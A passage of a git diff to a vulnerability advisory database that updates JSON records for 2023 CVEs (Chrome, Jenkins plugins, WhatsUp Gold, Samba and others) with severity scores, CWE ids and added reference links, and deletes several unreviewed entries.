"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,13 +28,29 @@ { "type": "WEB", "url": "https://crbug.com/1452137" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2023/dsa-5440" } ], "database_specific": { "cwe_ids": [ - + "CWE-843" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-26T21:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json b/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json index 487dda08cfe5d..47b9eeb50d96a 100644 --- a/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json +++ b/advisories/unreviewed/2023/06/GHSA-5rc2-qffv-3c8p/GHSA-5rc2-qffv-3c8p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5rc2-qffv-3c8p", - "modified": "2023-06-30T03:30:17Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-06-14T09:30:42Z", "aliases": [ "CVE-2023-30631" @@ -46,7 +46,7 @@ "cwe_ids": [ "CWE-20" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-14T08:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json b/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json index 5c607916f3616..d8b25322ef1c4 100644 --- a/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json +++ b/advisories/unreviewed/2023/06/GHSA-5rw6-vf4w-p4j3/GHSA-5rw6-vf4w-p4j3.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5428" diff --git a/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json b/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json index 6fcb21be4a710..d22b9e6224fdd 100644 --- a/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json +++ b/advisories/unreviewed/2023/06/GHSA-6c6g-97p2-3xrq/GHSA-6c6g-97p2-3xrq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6c6g-97p2-3xrq", - "modified": "2023-06-07T18:30:18Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-06-07T18:30:18Z", "aliases": [ "CVE-2023-29345" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29345" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-07T18:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json b/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json index 2d95442996800..df21287caaf16 100644 --- a/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json +++ b/advisories/unreviewed/2023/06/GHSA-8mwf-hvfp-6xfg/GHSA-8mwf-hvfp-6xfg.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.couchbase.com/alerts/" diff --git a/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json b/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json index 52618966891ca..5a9a64e18116d 100644 --- a/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json +++ b/advisories/unreviewed/2023/06/GHSA-943x-93ff-jr62/GHSA-943x-93ff-jr62.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-943x-93ff-jr62", - "modified": "2023-06-26T21:31:00Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-06-26T21:31:00Z", "aliases": [ "CVE-2023-3421" ], "details": "Use after free in Media in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,13 +28,33 @@ { "type": "WEB", "url": "https://crbug.com/1447568" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2023/dsa-5440" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1751" } ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-26T21:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json b/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json deleted file mode 100644 index df02744fbe68f..0000000000000 --- a/advisories/unreviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9pvw-8q92-hm9w", - "modified": "2023-06-23T15:30:41Z", - "published": "2023-06-14T15:30:37Z", - "aliases": [ - "CVE-2023-35143" - ], - "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35143" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3156" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-06-14T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json b/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json index 2a1ff261b4819..579501c56e3bd 100644 --- a/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json +++ b/advisories/unreviewed/2023/06/GHSA-f35r-mcw4-gg3w/GHSA-f35r-mcw4-gg3w.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5428" diff --git a/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json b/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json index 30d3bc6dacd69..0cfd5f4dec4aa 100644 --- a/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json +++ b/advisories/unreviewed/2023/06/GHSA-f47p-g3vj-j588/GHSA-f47p-g3vj-j588.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f47p-g3vj-j588", - "modified": "2023-06-23T21:30:33Z", + "modified": "2024-02-05T18:31:35Z", "published": "2023-06-23T21:30:33Z", "aliases": [ "CVE-2023-35759" ], "details": "In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input. This could allow an unauthenticated attacker to execute arbitrary code in a victim's browser, aka XSS.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -21,13 +24,17 @@ { "type": "WEB", "url": "https://community.progress.com/s/article/Product-Alert-Bulletin-June-2023" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176978/WhatsUp-Gold-2022-22.1.0-Build-39-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-23T20:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json b/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json index 91aa6f0435352..dc26816407568 100644 --- a/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json +++ b/advisories/unreviewed/2023/06/GHSA-gqjh-f545-vcx3/GHSA-gqjh-f545-vcx3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gqjh-f545-vcx3", - "modified": "2023-06-26T21:31:00Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-06-26T21:31:00Z", "aliases": [ "CVE-2023-3422" ], "details": "Use after free in Guest View in Google Chrome prior to 114.0.5735.198 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,13 +28,29 @@ { "type": "WEB", "url": "https://crbug.com/1450397" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KREKCQTJDVI2AEBG5ECZPSOQXIC2L5XL/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBAHED5YFJPRGSEKNZIYHZBGSVHGEHOH/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2023/dsa-5440" } ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-26T21:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json b/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json index 4354b205fc175..3c8203c5811cb 100644 --- a/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json +++ b/advisories/unreviewed/2023/06/GHSA-h296-3g4r-f68j/GHSA-h296-3g4r-f68j.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-11" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5428" diff --git a/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json b/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json deleted file mode 100644 index f257b936e3573..0000000000000 --- a/advisories/unreviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rr3p-5fcf-v5m3", - "modified": "2023-06-23T18:30:21Z", - "published": "2023-06-14T15:30:37Z", - "aliases": [ - "CVE-2023-35142" - ], - "details": "Jenkins Checkmarx Plugin 2022.4.3 and earlier disables SSL/TLS validation for connections to the Checkmarx server by default.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35142" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2870" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-295" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-06-14T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json b/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json index 12956ab6a6aef..ead3339d3b242 100644 --- a/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json +++ b/advisories/unreviewed/2023/06/GHSA-rv3g-cgph-cc24/GHSA-rv3g-cgph-cc24.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rv3g-cgph-cc24", - "modified": "2023-06-23T18:30:22Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-06-14T21:30:40Z", "aliases": [ "CVE-2023-34565" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-06-14T21:15:09Z" diff --git a/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json b/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json deleted file mode 100644 index 501ffe1565ef7..0000000000000 --- a/advisories/unreviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-whgj-6m78-2gg9", - "modified": "2023-06-23T18:30:21Z", - "published": "2023-06-14T15:30:37Z", - "aliases": [ - "CVE-2023-35147" - ], - "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35147" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3099" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-732" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-06-14T13:15:12Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json b/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json index 9ed11de9fb12e..5e28cb54ec687 100644 --- a/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json +++ b/advisories/unreviewed/2023/06/GHSA-x2m3-cgh8-69x5/GHSA-x2m3-cgh8-69x5.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://zigrin.com/advisories/misp-stored-xss/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176975/MISP-2.4.171-Cross-Site-Scripting.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json b/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json deleted file mode 100644 index 4814d39a0747f..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-27pr-r7hm-c2rc", - "modified": "2023-07-19T18:30:55Z", - "published": "2023-07-19T18:30:55Z", - "aliases": [ - "CVE-2023-32261" - ], - "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.\nSee the following Jenkins security advisory for details: * https://www.jenkins.io/security/advisory/2023-06-14/ https://www.jenkins.io/security/advisory/2023-06-14/ \n\n\n\n\n", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32261" - }, - { - "type": "WEB", - "url": "https://plugins.jenkins.io/dimensionsscm/" - }, - { - "type": "WEB", - "url": "https://portal.microfocus.com/s/article/KM000019297" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-07-19T16:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json b/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json index 014b4ea6b7f7e..c8035c4bd5e69 100644 --- a/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json +++ b/advisories/unreviewed/2023/07/GHSA-3p3x-vg38-6g9q/GHSA-3p3x-vg38-6g9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3p3x-vg38-6g9q", - "modified": "2023-07-28T21:30:34Z", + "modified": "2024-02-04T09:30:42Z", "published": "2023-07-19T12:31:02Z", "aliases": [ "CVE-2023-3446" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230803-0011/" @@ -70,7 +74,7 @@ "cwe_ids": [ "CWE-1333" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-19T12:15:10Z" diff --git a/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json b/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json index d8a308418714e..2b31cd645f0a4 100644 --- a/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json +++ b/advisories/unreviewed/2023/07/GHSA-45c7-642q-qm9m/GHSA-45c7-642q-qm9m.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34966" diff --git a/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json b/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json index d5b2fb5ee0baf..5420541f2f195 100644 --- a/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json +++ b/advisories/unreviewed/2023/07/GHSA-5g4j-78x8-fff7/GHSA-5g4j-78x8-fff7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5g4j-78x8-fff7", - "modified": "2023-08-23T18:30:29Z", + "modified": "2024-02-01T18:31:04Z", "published": "2023-07-06T19:24:04Z", "aliases": [ "CVE-2022-3703" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-345" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2022-11-10T22:15:00Z" diff --git a/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json b/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json index 0cf1b25a244ea..a7cbcc80248f4 100644 --- a/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json +++ b/advisories/unreviewed/2023/07/GHSA-73p2-7vjh-9qx4/GHSA-73p2-7vjh-9qx4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-73p2-7vjh-9qx4", - "modified": "2023-11-30T18:31:13Z", + "modified": "2024-01-30T00:30:28Z", "published": "2023-07-21T00:30:23Z", "aliases": [ "CVE-2023-25835" diff --git a/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json b/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json index 133f6d3f4c652..afba335073740 100644 --- a/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json +++ b/advisories/unreviewed/2023/07/GHSA-786x-44fx-qqh8/GHSA-786x-44fx-qqh8.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0404" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0569" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3019" diff --git a/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json b/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json index b6800a81c4923..4a37e198128a5 100644 --- a/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json +++ b/advisories/unreviewed/2023/07/GHSA-7rhj-qr35-3pvg/GHSA-7rhj-qr35-3pvg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7rhj-qr35-3pvg", - "modified": "2023-11-29T21:30:16Z", + "modified": "2024-01-30T00:30:29Z", "published": "2023-07-21T06:30:17Z", "aliases": [ "CVE-2023-25837" diff --git a/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json b/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json index 464daecdc3033..27392eef60d29 100644 --- a/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json +++ b/advisories/unreviewed/2023/07/GHSA-7x98-4rw8-872g/GHSA-7x98-4rw8-872g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7x98-4rw8-872g", - "modified": "2024-01-25T21:32:11Z", + "modified": "2024-01-30T18:30:18Z", "published": "2023-07-25T18:30:32Z", "aliases": [ "CVE-2023-3772" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3772" diff --git a/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json b/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json index e2b19288ba392..6f4c5e1ffa93a 100644 --- a/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json +++ b/advisories/unreviewed/2023/07/GHSA-86p4-vhr6-2vv3/GHSA-86p4-vhr6-2vv3.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34967" diff --git a/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json b/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json deleted file mode 100644 index 2145c1fbff6aa..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8hc6-w44m-wfxf", - "modified": "2023-07-19T18:30:56Z", - "published": "2023-07-19T18:30:56Z", - "aliases": [ - "CVE-2023-32263" - ], - "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability could be exploited to retrieve a login certificate if an authenticated user is duped into using an attacker-controlled Dimensions CM server. This vulnerability only applies when the Jenkins plugin is configured to use login certificate credentials.\n\n\n https://www.jenkins.io/security/advisory/2023-06-14/ \n\n", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32263" - }, - { - "type": "WEB", - "url": "https://plugins.jenkins.io/dimensionsscm/" - }, - { - "type": "WEB", - "url": "https://portal.microfocus.com/s/article/KM000019293" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-07-19T16:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json b/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json index ffe0c1740de09..3406589ed9ced 100644 --- a/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json +++ b/advisories/unreviewed/2023/07/GHSA-c945-cqj5-wfv6/GHSA-c945-cqj5-wfv6.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00019.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0014/" diff --git a/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json b/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json index 168742b52c384..92e0c2ee6861f 100644 --- a/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json +++ b/advisories/unreviewed/2023/07/GHSA-cfhp-p6xr-24g5/GHSA-cfhp-p6xr-24g5.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-34968" diff --git a/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json 